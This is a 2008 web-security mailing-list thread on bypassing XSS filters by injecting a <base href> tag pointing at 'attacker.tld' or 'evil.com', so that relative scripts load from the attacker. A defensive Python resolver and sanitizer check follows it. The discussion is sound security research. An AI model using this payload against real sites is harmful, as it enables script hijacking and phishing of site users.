Re: [WEB SECURITY] Nice little XSS trick
- From: Bill Pennington <bill@xxxxxxxxxxxxxxx>
- Subject: Re: [WEB SECURITY] Nice little XSS trick
- Date: Wed, 16 Jul 2008 09:14:36 -0700 (PDT)
Well it's clear that All your <base href> are belong to us :-)
Come on someone had to say it!
---
Bill Pennington
VP Services
WhiteHat Security Inc.
http://www.whitehatsec.com
----- Original Message -----
From: "Arshan Dabirsiaghi" <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx>
To: aksecurity@xxxxxxxxx, websecurity@xxxxxxxxxxxxx
Sent: Wednesday, July 16, 2008 6:52:45 AM GMT -08:00 US/Canada Pacific
Subject: Re: [WEB SECURITY] Nice little XSS trick
http://i8jesus.com/?p=10 (Jan 2008)
I also presented this vector last year at OWASP San Jose when I demo'ed AntiSamy as an example of dangerous content that isn't malicious code on its own. That's one of the selling points of AntiSamy - it stops not only XSS (well, we hope) but also prevents phishing attacks that abuse HTML/CSS.
I talked about it with RSnake afterwards and he had some crazy reason for not putting it on his cheatsheet - claimed it was too much like the <base href="javascript:foo();//"> vector. As noted on my blog post, IE7 is no longer (according to policy) supposed to be honoring <base> tags outside of <HEAD>, but FF is still vulnerable. You could use this to hijack anything - stylesheets (more XSS/phishing), images, scripts, etc. The only thing <base> won't help you steal as far as resources is anything gathered in JavaScript.
I think some of the big players had this figured out already (or more likely, just got really lucky). MySpace takes <base href> values, base64 encodes them, and redirects them through another domain. The flow is like this for them:
1. User puts in <base href="http://evil.com">
2. Str = base64("http://evil.com")
3. Profile = <base href="http://msplinks.com/redir?<base64encodedStr>
Maybe there's a way to abuse that, but I don't think so. And eBay doesn't have any relative links after user content, at least when I first looked at this last year. They probably both just got lucky. =]
Arshan
---------- Previous message ----------
From: Amit Klein <aksecurity@xxxxxxxxx>
Date: Tue, Jul 15, 2008 at 7:33 AM
Subject: [WEB SECURITY] Nice little XSS trick
To: Web Security <websecurity@xxxxxxxxxxxxx>
Hi list
Recently I've been thinking about bypassing anti-XSS filters, and a nice little trick occurred to me, which I haven't seen anywhere (e.g. it's not on RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention BASe, but not the trick I describe here). The idea is to use the HTML BASE tag to force loading of JS code from the attacker's host. Consider a page with XSS vulnerability such as:
<html>
...
***XSS code may be embedded here***
...
<script src="/foo/bar.js"></script>
...
</html>
Now, an attacker can inject <base href="http://www.attacker.tld/">, and next thing you know, the browser (IE, at least) loads the JS from http://www.attacker.tld/foo/bar.js... And the beauty is that there's no "explicit" JS code involved in the payload itself.
Note that according to the HTML standard, BASE should be placed in the HEAD section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE). This is indeed observed by FF 2, but not by IE (checked IE6).
Thanks,
-Amit
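The mechanism Amit describes (an injected <base href> silently re-rooting every later relative URL, including a trusted-looking <script src="/foo/bar.js">) and the sanitizer-side defence Arshan alludes to (treat <base> in user content as dangerous even though it contains no script) can both be shown with a small parser. The following is an added example, not code from anyone in this thread: it resolves <script src> URLs the way a lenient browser that honours <base> anywhere in the document would, and it provides a check that flags any <base> tag in a user-supplied fragment. The page URL www.example.com and the template below are constructed; www.attacker.tld is the placeholder host used in the thread.

```python
"""
Shows why an injected <base href> is an XSS vector even though the payload
contains no JavaScript, and a defensive check for user-supplied HTML.
Added example; hostnames and page template are constructed for illustration.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin

# Constructed stand-in for the vulnerable page in the thread: user content is
# reflected before a relative <script src>.
PAGE_TEMPLATE = (
    '<html><body>{user_content}'
    '<script src="/foo/bar.js"></script>'
    '</body></html>'
)


class BaseAwareScriptResolver(HTMLParser):
    """Records the absolute URL each <script src> resolves to, honouring any
    <base href> seen so far regardless of where it appears in the document
    (the lenient behaviour the thread attributes to IE6/IE7 and Firefox)."""

    def __init__(self, document_url):
        super().__init__()
        self.base = document_url
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # html.parser lower-cases tag and attribute names
        if tag == "base" and a.get("href"):
            # Later relative URLs now resolve against the injected base.
            self.base = urljoin(self.base, a["href"])
        elif tag == "script" and a.get("src"):
            self.scripts.append(urljoin(self.base, a["src"]))


def resolve_script_urls(document_url, html):
    """Return the list of absolute script URLs a base-honouring browser would load."""
    parser = BaseAwareScriptResolver(document_url)
    parser.feed(html)
    parser.close()
    return parser.scripts


class BaseTagFinder(HTMLParser):
    """Collects every <base> start tag (including self-closing <base/>)."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag == "base":
            self.found.append(dict(attrs))


def find_base_tags(fragment):
    finder = BaseTagFinder()
    finder.feed(fragment)
    finder.close()
    return finder.found


def is_safe_fragment(fragment):
    """Sanitizer rule: user content must not carry a <base> tag at all."""
    return not find_base_tags(fragment)


if __name__ == "__main__":
    page_url = "http://www.example.com/page"
    benign = PAGE_TEMPLATE.format(user_content="<b>hello</b>")
    injected = PAGE_TEMPLATE.format(
        user_content='<base href="http://www.attacker.tld/">')
    print("benign  ->", resolve_script_urls(page_url, benign))
    print("injected->", resolve_script_urls(page_url, injected))
    print("fragment allowed?", is_safe_fragment('<base href="http://www.attacker.tld/">'))
```

Rejecting the tag outright is the simplest rule for a sanitizer; the alternative Arshan describes for MySpace (rewriting the href through a redirector on another domain) keeps the tag but still costs every relative link its original meaning, so for most applications stripping <base> and emitting absolute URLs for trusted scripts is the safer design.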